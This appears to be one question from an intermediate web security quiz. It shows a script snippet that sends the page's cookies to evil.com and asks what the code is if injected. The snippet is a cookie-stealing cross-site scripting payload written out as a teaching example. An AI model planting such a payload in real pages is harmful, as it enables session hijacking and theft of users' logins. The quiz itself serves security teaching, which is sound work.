Skip to main content
🔒Securityintermediate

Question 1 of 10

<script>
  document.location = 
    'https://evil.com?c=' + document.cookie
</script>
// If injected, this is?

What's the output?

Tech School/Quiz/Security (Intermediate)